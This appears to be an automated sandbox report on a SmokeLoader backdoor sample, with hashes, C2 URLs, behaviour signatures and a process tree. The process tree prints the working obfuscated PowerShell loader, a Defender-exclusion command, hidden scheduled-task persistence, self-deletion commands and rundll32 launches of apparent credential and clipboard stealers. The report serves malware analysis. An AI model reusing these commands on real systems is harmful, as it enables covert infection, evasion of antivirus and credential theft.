Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
20-04-2023 00:10
Static task
static1
General
-
Target
f17263a83ea1c51f172cf8021695a62904228bcc94c76a4f3aee92aa11d1531e.exe
-
Size
235KB
-
MD5
f066332ccc81b918c04cdcab3b828c27
-
SHA1
4082bbb60d30dbcbfa95f921ab8d37f53d94b374
-
SHA256
f17263a83ea1c51f172cf8021695a62904228bcc94c76a4f3aee92aa11d1531e
-
SHA512
9f227a999089c3355a7df103997ccfcab080c59067271e5ae169e694851448c5d187566851cdba0f32282906edb337d9938ebde9e58cb932f3d138af92fff5c0
-
SSDEEP
3072:Mo4YHU2P1TYkOpeBqwDn3RBCStOvknEZ4F/z5L9dSajk4/owe3:FFHUoHOA3ySYvknEeD9d5g4/ve3
Malware Config
Extracted
smokeloader
sprg
Extracted
smokeloader
2022
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Deletes itself 1 IoCs
pid Process 3212 Process not Found -
Executes dropped EXE 3 IoCs
pid Process 4744 F83F.bat.exe 4556 olTsz.bat.exe 2764 t2qzivu5.vrn.exe -
Loads dropped DLL 9 IoCs
pid Process 3364 rundll32.exe 2220 rundll32.exe 4976 rundll32.exe 4132 rundll32.exe 4340 rundll32.exe 1052 rundll32.exe 1316 rundll32.exe 1308 rundll32.exe 2400 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 4312 1308 WerFault.exe 108 4460 1316 WerFault.exe 107 4280 2400 WerFault.exe 106 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f17263a83ea1c51f172cf8021695a62904228bcc94c76a4f3aee92aa11d1531e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f17263a83ea1c51f172cf8021695a62904228bcc94c76a4f3aee92aa11d1531e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f17263a83ea1c51f172cf8021695a62904228bcc94c76a4f3aee92aa11d1531e.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings F83F.bat.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1484 f17263a83ea1c51f172cf8021695a62904228bcc94c76a4f3aee92aa11d1531e.exe 1484 f17263a83ea1c51f172cf8021695a62904228bcc94c76a4f3aee92aa11d1531e.exe 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3212 Process not Found -
Suspicious behavior: MapViewOfSection 19 IoCs
pid Process 1484 f17263a83ea1c51f172cf8021695a62904228bcc94c76a4f3aee92aa11d1531e.exe 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found 3212 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3212 Process not Found Token: SeCreatePagefilePrivilege 3212 Process not Found Token: SeDebugPrivilege 4744 F83F.bat.exe Token: SeShutdownPrivilege 3212 Process not Found Token: SeCreatePagefilePrivilege 3212 Process not Found Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 2512 powershell.exe Token: SeShutdownPrivilege 3212 Process not Found Token: SeCreatePagefilePrivilege 3212 Process not Found Token: SeShutdownPrivilege 3212 Process not Found Token: SeCreatePagefilePrivilege 3212 Process not Found Token: SeShutdownPrivilege 3212 Process not Found Token: SeCreatePagefilePrivilege 3212 Process not Found Token: SeDebugPrivilege 5116 powershell.exe Token: SeIncreaseQuotaPrivilege 5116 powershell.exe Token: SeSecurityPrivilege 5116 powershell.exe Token: SeTakeOwnershipPrivilege 5116 powershell.exe Token: SeLoadDriverPrivilege 5116 powershell.exe Token: SeSystemProfilePrivilege 5116 powershell.exe Token: SeSystemtimePrivilege 5116 powershell.exe Token: SeProfSingleProcessPrivilege 5116 powershell.exe Token: SeIncBasePriorityPrivilege 5116 powershell.exe Token: SeCreatePagefilePrivilege 5116 powershell.exe Token: SeBackupPrivilege 5116 powershell.exe Token: SeRestorePrivilege 5116 powershell.exe Token: SeShutdownPrivilege 5116 powershell.exe Token: SeDebugPrivilege 5116 powershell.exe Token: SeSystemEnvironmentPrivilege 5116 powershell.exe Token: SeRemoteShutdownPrivilege 5116 powershell.exe Token: SeUndockPrivilege 5116 powershell.exe Token: SeManageVolumePrivilege 5116 powershell.exe Token: 33 5116 powershell.exe Token: 34 5116 powershell.exe Token: 35 5116 powershell.exe Token: 36 5116 powershell.exe Token: SeDebugPrivilege 4532 powershell.exe Token: SeIncreaseQuotaPrivilege 4532 powershell.exe Token: SeSecurityPrivilege 4532 powershell.exe Token: SeTakeOwnershipPrivilege 4532 powershell.exe Token: SeLoadDriverPrivilege 4532 powershell.exe Token: SeSystemProfilePrivilege 4532 powershell.exe Token: SeSystemtimePrivilege 4532 powershell.exe Token: SeProfSingleProcessPrivilege 4532 powershell.exe Token: SeIncBasePriorityPrivilege 4532 powershell.exe Token: SeCreatePagefilePrivilege 4532 powershell.exe Token: SeBackupPrivilege 4532 powershell.exe Token: SeRestorePrivilege 4532 powershell.exe Token: SeShutdownPrivilege 4532 powershell.exe Token: SeDebugPrivilege 4532 powershell.exe Token: SeSystemEnvironmentPrivilege 4532 powershell.exe Token: SeRemoteShutdownPrivilege 4532 powershell.exe Token: SeUndockPrivilege 4532 powershell.exe Token: SeManageVolumePrivilege 4532 powershell.exe Token: 33 4532 powershell.exe Token: 34 4532 powershell.exe Token: 35 4532 powershell.exe Token: 36 4532 powershell.exe Token: SeIncreaseQuotaPrivilege 4532 powershell.exe Token: SeSecurityPrivilege 4532 powershell.exe Token: SeTakeOwnershipPrivilege 4532 powershell.exe Token: SeLoadDriverPrivilege 4532 powershell.exe Token: SeSystemProfilePrivilege 4532 powershell.exe Token: SeSystemtimePrivilege 4532 powershell.exe Token: SeProfSingleProcessPrivilege 4532 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3212 wrote to memory of 2548 3212 Process not Found 66 PID 3212 wrote to memory of 2548 3212 Process not Found 66 PID 2548 wrote to memory of 4420 2548 cmd.exe 68 PID 2548 wrote to memory of 4420 2548 cmd.exe 68 PID 4420 wrote to memory of 4744 4420 cmd.exe 70 PID 4420 wrote to memory of 4744 4420 cmd.exe 70 PID 4420 wrote to memory of 4744 4420 cmd.exe 70 PID 3212 wrote to memory of 3708 3212 Process not Found 71 PID 3212 wrote to memory of 3708 3212 Process not Found 71 PID 3212 wrote to memory of 3708 3212 Process not Found 71 PID 3212 wrote to memory of 3708 3212 Process not Found 71 PID 3212 wrote to memory of 4780 3212 Process not Found 72 PID 3212 wrote to memory of 4780 3212 Process not Found 72 PID 3212 wrote to memory of 4780 3212 Process not Found 72 PID 3212 wrote to memory of 1372 3212 Process not Found 73 PID 3212 wrote to memory of 1372 3212 Process not Found 73 PID 3212 wrote to memory of 1372 3212 Process not Found 73 PID 3212 wrote to memory of 1372 3212 Process not Found 73 PID 3212 wrote to memory of 4920 3212 Process not Found 74 PID 3212 wrote to memory of 4920 3212 Process not Found 74 PID 3212 wrote to memory of 4920 3212 Process not Found 74 PID 3212 wrote to memory of 768 3212 Process not Found 75 PID 3212 wrote to memory of 768 3212 Process not Found 75 PID 3212 wrote to memory of 768 3212 Process not Found 75 PID 3212 wrote to memory of 768 3212 Process not Found 75 PID 3212 wrote to memory of 2944 3212 Process not Found 76 PID 3212 wrote to memory of 2944 3212 Process not Found 76 PID 3212 wrote to memory of 2944 3212 Process not Found 76 PID 3212 wrote to memory of 2944 3212 Process not Found 76 PID 3212 wrote to memory of 2192 3212 Process not Found 77 PID 3212 wrote to memory of 2192 3212 Process not Found 77 PID 3212 wrote to memory of 2192 3212 Process not Found 77 PID 3212 wrote to memory of 2192 3212 Process not Found 77 PID 4744 wrote to memory of 3992 4744 F83F.bat.exe 78 PID 4744 wrote to memory of 3992 4744 F83F.bat.exe 78 PID 4744 wrote to memory of 3992 4744 F83F.bat.exe 78 PID 4744 wrote to memory of 2512 4744 F83F.bat.exe 80 PID 4744 wrote to memory of 2512 4744 F83F.bat.exe 80 PID 4744 wrote to memory of 2512 4744 F83F.bat.exe 80 PID 3212 wrote to memory of 200 3212 Process not Found 82 PID 3212 wrote to memory of 200 3212 Process not Found 82 PID 3212 wrote to memory of 200 3212 Process not Found 82 PID 3212 wrote to memory of 880 3212 Process not Found 83 PID 3212 wrote to memory of 880 3212 Process not Found 83 PID 3212 wrote to memory of 880 3212 Process not Found 83 PID 3212 wrote to memory of 880 3212 Process not Found 83 PID 4744 wrote to memory of 5116 4744 F83F.bat.exe 84 PID 4744 wrote to memory of 5116 4744 F83F.bat.exe 84 PID 4744 wrote to memory of 5116 4744 F83F.bat.exe 84 PID 4744 wrote to memory of 4532 4744 F83F.bat.exe 86 PID 4744 wrote to memory of 4532 4744 F83F.bat.exe 86 PID 4744 wrote to memory of 4532 4744 F83F.bat.exe 86 PID 4744 wrote to memory of 4268 4744 F83F.bat.exe 88 PID 4744 wrote to memory of 4268 4744 F83F.bat.exe 88 PID 4744 wrote to memory of 4268 4744 F83F.bat.exe 88 PID 4268 wrote to memory of 5076 4268 WScript.exe 89 PID 4268 wrote to memory of 5076 4268 WScript.exe 89 PID 4268 wrote to memory of 5076 4268 WScript.exe 89 PID 5076 wrote to memory of 4556 5076 cmd.exe 91 PID 5076 wrote to memory of 4556 5076 cmd.exe 91 PID 5076 wrote to memory of 4556 5076 cmd.exe 91 PID 4556 wrote to memory of 1388 4556 olTsz.bat.exe 92 PID 4556 wrote to memory of 1388 4556 olTsz.bat.exe 92 PID 4556 wrote to memory of 1388 4556 olTsz.bat.exe 92 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f17263a83ea1c51f172cf8021695a62904228bcc94c76a4f3aee92aa11d1531e.exe"C:\Users\Admin\AppData\Local\Temp\f17263a83ea1c51f172cf8021695a62904228bcc94c76a4f3aee92aa11d1531e.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1484
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F83F.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\F83F.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4420 -
C:\Users\Admin\AppData\Local\Temp\F83F.bat.exe"C:\Users\Admin\AppData\Local\Temp\F83F.bat.exe" -w hidden -c $Yhss='COBPTreaOBPTteOBPTDecOBPTryOBPTptOBPTorOBPT'.Replace('OBPT', '');$CYDS='MOBPTainMOBPToduOBPTlOBPTeOBPT'.Replace('OBPT', '');$Lvkd='TraOBPTnOBPTsfOBPTormOBPTFinOBPTalOBPTBlOBPToOBPTckOBPT'.Replace('OBPT', '');$oRgU='FiOBPTrOBPTstOBPT'.Replace('OBPT', '');$XmlI='SpOBPTlitOBPT'.Replace('OBPT', '');$oNkQ='GeOBPTtCOBPTuOBPTrrOBPTentOBPTPOBPTroOBPTcOBPTesOBPTsOBPT'.Replace('OBPT', '');$ZQpO='EnOBPTtOBPTrOBPTyOBPTPoiOBPTnOBPTtOBPT'.Replace('OBPT', '');$wkxV='ChanOBPTgeEOBPTxteOBPTnsiOBPTonOBPT'.Replace('OBPT', '');$DpWU='LoaOBPTdOBPT'.Replace('OBPT', '');$tmSV='InOBPTvOBPTokOBPTeOBPT'.Replace('OBPT', '');$qrdA='ReadOBPTLiOBPTnesOBPT'.Replace('OBPT', '');$ujLd='FrOBPTomBOBPTasOBPTe64OBPTSOBPTtrOBPTingOBPT'.Replace('OBPT', '');function YwbRc($LbUAF){$VKueZ=[System.Security.Cryptography.Aes]::Create();$VKueZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VKueZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VKueZ.Key=[System.Convert]::$ujLd('W9fChbBVxve7XC6gEtL6ycNU/d+U1Givk93frR5IDQs=');$VKueZ.IV=[System.Convert]::$ujLd('udmMANy4uNJ7yFspg1Rrzw==');$JKnul=$VKueZ.$Yhss();$dzRYO=$JKnul.$Lvkd($LbUAF,0,$LbUAF.Length);$JKnul.Dispose();$VKueZ.Dispose();$dzRYO;}function jClid($LbUAF){$qfZKy=New-Object System.IO.MemoryStream(,$LbUAF);$DgUOH=New-Object System.IO.MemoryStream;$xPkWq=New-Object System.IO.Compression.GZipStream($qfZKy,[IO.Compression.CompressionMode]::Decompress);$xPkWq.CopyTo($DgUOH);$xPkWq.Dispose();$qfZKy.Dispose();$DgUOH.Dispose();$DgUOH.ToArray();}$YiUaM=[System.Linq.Enumerable]::$oRgU([System.IO.File]::$qrdA([System.IO.Path]::$wkxV([System.Diagnostics.Process]::$oNkQ().$CYDS.FileName, $null)));$XdmBJ=$YiUaM.Substring(3).$XmlI(':');$wIgfY=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[0])));$eAKZo=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[1])));[System.Reflection.Assembly]::$DpWU([byte[]]$eAKZo).$ZQpO.$tmSV($null,$null);[System.Reflection.Assembly]::$DpWU([byte[]]$wIgfY).$ZQpO.$tmSV($null,$null);3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4744);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\F83F')4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_olTsz' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\olTsz.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4532
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\olTsz.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\olTsz.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Users\Admin\AppData\Roaming\olTsz.bat.exe"C:\Users\Admin\AppData\Roaming\olTsz.bat.exe" -w hidden -c $Yhss='COBPTreaOBPTteOBPTDecOBPTryOBPTptOBPTorOBPT'.Replace('OBPT', '');$CYDS='MOBPTainMOBPToduOBPTlOBPTeOBPT'.Replace('OBPT', '');$Lvkd='TraOBPTnOBPTsfOBPTormOBPTFinOBPTalOBPTBlOBPToOBPTckOBPT'.Replace('OBPT', '');$oRgU='FiOBPTrOBPTstOBPT'.Replace('OBPT', '');$XmlI='SpOBPTlitOBPT'.Replace('OBPT', '');$oNkQ='GeOBPTtCOBPTuOBPTrrOBPTentOBPTPOBPTroOBPTcOBPTesOBPTsOBPT'.Replace('OBPT', '');$ZQpO='EnOBPTtOBPTrOBPTyOBPTPoiOBPTnOBPTtOBPT'.Replace('OBPT', '');$wkxV='ChanOBPTgeEOBPTxteOBPTnsiOBPTonOBPT'.Replace('OBPT', '');$DpWU='LoaOBPTdOBPT'.Replace('OBPT', '');$tmSV='InOBPTvOBPTokOBPTeOBPT'.Replace('OBPT', '');$qrdA='ReadOBPTLiOBPTnesOBPT'.Replace('OBPT', '');$ujLd='FrOBPTomBOBPTasOBPTe64OBPTSOBPTtrOBPTingOBPT'.Replace('OBPT', '');function YwbRc($LbUAF){$VKueZ=[System.Security.Cryptography.Aes]::Create();$VKueZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VKueZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VKueZ.Key=[System.Convert]::$ujLd('W9fChbBVxve7XC6gEtL6ycNU/d+U1Givk93frR5IDQs=');$VKueZ.IV=[System.Convert]::$ujLd('udmMANy4uNJ7yFspg1Rrzw==');$JKnul=$VKueZ.$Yhss();$dzRYO=$JKnul.$Lvkd($LbUAF,0,$LbUAF.Length);$JKnul.Dispose();$VKueZ.Dispose();$dzRYO;}function jClid($LbUAF){$qfZKy=New-Object System.IO.MemoryStream(,$LbUAF);$DgUOH=New-Object System.IO.MemoryStream;$xPkWq=New-Object System.IO.Compression.GZipStream($qfZKy,[IO.Compression.CompressionMode]::Decompress);$xPkWq.CopyTo($DgUOH);$xPkWq.Dispose();$qfZKy.Dispose();$DgUOH.Dispose();$DgUOH.ToArray();}$YiUaM=[System.Linq.Enumerable]::$oRgU([System.IO.File]::$qrdA([System.IO.Path]::$wkxV([System.Diagnostics.Process]::$oNkQ().$CYDS.FileName, $null)));$XdmBJ=$YiUaM.Substring(3).$XmlI(':');$wIgfY=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[0])));$eAKZo=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[1])));[System.Reflection.Assembly]::$DpWU([byte[]]$eAKZo).$ZQpO.$tmSV($null,$null);[System.Reflection.Assembly]::$DpWU([byte[]]$wIgfY).$ZQpO.$tmSV($null,$null);6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4556);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;7⤵PID:1388
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')7⤵PID:4388
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\olTsz')7⤵PID:1020
-
-
C:\Users\Admin\AppData\Local\Temp\t2qzivu5.vrn.exe"C:\Users\Admin\AppData\Local\Temp\t2qzivu5.vrn.exe"7⤵
- Executes dropped EXE
PID:2764 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\cred64.dll, Main8⤵
- Loads dropped DLL
PID:4340 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\cred64.dll, Main9⤵
- Loads dropped DLL
PID:2400 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2400 -s 59610⤵
- Program crash
PID:4280
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\cred64.dll, Main8⤵
- Loads dropped DLL
PID:4132 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\cred64.dll, Main9⤵
- Loads dropped DLL
PID:1308 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1308 -s 59610⤵
- Program crash
PID:4312
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\cred64.dll, Main8⤵
- Loads dropped DLL
PID:4976 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\cred64.dll, Main9⤵
- Loads dropped DLL
PID:1316 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1316 -s 59610⤵
- Program crash
PID:4460
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\clip64.dll, Main8⤵
- Loads dropped DLL
PID:3364
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\clip64.dll, Main8⤵
- Loads dropped DLL
PID:2220
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b1062eb64a0f99\clip64.dll, Main8⤵
- Loads dropped DLL
PID:1052
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2764);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;7⤵PID:3208
-
-
-
-
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3708
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4780
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1372
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4920
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:768
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2944
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2192
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:200
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:880
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD51c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
Filesize
45KB
MD55f640bd48e2547b4c1a7421f080f815f
SHA1a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a
SHA256916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c
SHA512a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e
-
Filesize
15KB
MD5fa35ca6b05a86c633313bc66eebe82b5
SHA166c6868a9f561d375b15c68b2629229861b419b0
SHA25685a2bcf2121c8f95c6b5dd296ad048e5db4e10fb65e7fa259d77312342b1b13e
SHA51257d8a0f0952ecb9f8f4340a8eeb915d9dd8dfcedf0c5d0487a0c1c6a9bd93647f795d6557ca7e09dbb83689d036348c05f0df194bdd9cfa382ea1aaf71bb64be
-
Filesize
17KB
MD5d1df9776e9356dd480da171ea550aef7
SHA17fc622cec875b2811076bcf26387e452578490a5
SHA256b88b80024b5b2221bddbf8c2678eeb208f7d59d94cd54f7e257bf7c990c8d4a4
SHA512beab48513f5b3a7b029254c09c4a2ee40886afb376a26f30929cc329c76e94480e7c33086c2a982e03551260c140cb76bf64adfcb0c26940d66adb48351f9752
-
Filesize
16KB
MD521fecf1d5285bb45284074dbe56f7201
SHA1878c6f803af2d59c94b7c3c9afa486f3cdeca36f
SHA256515a33e2ffafe77b399a793f2b0efbb4c1283c3db05ba4e422437452edff5186
SHA5120fd87afdfeabb8f710feec62ec5b45d3cd3d81cef10eb11da5059d672dcb16aa71238e688371437fd1fef154e1f972a5014f18860adc11ff50e5d920f61f0c6e
-
Filesize
16KB
MD521fecf1d5285bb45284074dbe56f7201
SHA1878c6f803af2d59c94b7c3c9afa486f3cdeca36f
SHA256515a33e2ffafe77b399a793f2b0efbb4c1283c3db05ba4e422437452edff5186
SHA5120fd87afdfeabb8f710feec62ec5b45d3cd3d81cef10eb11da5059d672dcb16aa71238e688371437fd1fef154e1f972a5014f18860adc11ff50e5d920f61f0c6e
-
Filesize
18KB
MD5bf93a02356050f526f20d4218e970262
SHA1b930cdc3d5c2269e680aa3bd62efb72ff245ff71
SHA2560d2f435606c6a20d27cdc88dc323d19a797bd7e8e7186b56f003a2169c09631d
SHA512b467df4479a226e073f2982050cabf7c88b2ccfe1e2524e8365ce9744a0ec6d0d4da297f8ca792716cd629036d47b54aade401596533911fc2085e1183dfa924
-
Filesize
19KB
MD57a6b40cc662bfbc8cb0476d99b9fe0d6
SHA11e3be003f259acf5a9a972a4bae6d4f74ea66a93
SHA25603a8cede5bcd6b264ded7823900a7e52fc5309a296e1de82f62b362fb2e24f64
SHA5129b8bd5531d1136c5e5496ce2d6e867a3179009390882326b71e783b4c83c1e4bcda5c3a0ab896ca75d45d794e5a83a6ad5dc76e26fd536086b65f457649dbdb6
-
Filesize
17KB
MD5ae5bb6b2e6bb4fd8077bb108acceaebf
SHA1601d8aeb44ed2a466ce739672c0e5cbe07da66d3
SHA256fd96f4199671f8b8f5364153fe8d5eb549fac2035f261ec1ac8b9ac9ccb062e9
SHA5126becf080260546ac29d51cf6c9158207ecd4112b60e6250c2562f5854f234a096d4f2c36e5dc5b48beab673671acb3a526fcfa7b1a0d32291fd1be8993afd741
-
Filesize
17KB
MD5ae5bb6b2e6bb4fd8077bb108acceaebf
SHA1601d8aeb44ed2a466ce739672c0e5cbe07da66d3
SHA256fd96f4199671f8b8f5364153fe8d5eb549fac2035f261ec1ac8b9ac9ccb062e9
SHA5126becf080260546ac29d51cf6c9158207ecd4112b60e6250c2562f5854f234a096d4f2c36e5dc5b48beab673671acb3a526fcfa7b1a0d32291fd1be8993afd741
-
Filesize
352KB
MD52115cc47f7ef6e7152e2326de4f32f2a
SHA1ed68fa31b9f635cdeb3a26710c2ec9689dcb8f97
SHA2566ae23d8550d0f10cd34797e5821fd78a2d50236e9f8a931a398f8f26daffbfad
SHA5121c3727cfa39dc010dec742f0f98eba3d881a7802ed59c28b74daa514b71dee8e62e8ba21514ecb2bd9ae3a765b4d029f29ceee1f2865714c10255d6820811012
-
Filesize
420KB
MD5be8ffebe1c4b5e18a56101a3c0604ea0
SHA12ec8af7c1538974d64291845dcb02111b907770f
SHA256d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5
SHA51271008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb
-
Filesize
420KB
MD5be8ffebe1c4b5e18a56101a3c0604ea0
SHA12ec8af7c1538974d64291845dcb02111b907770f
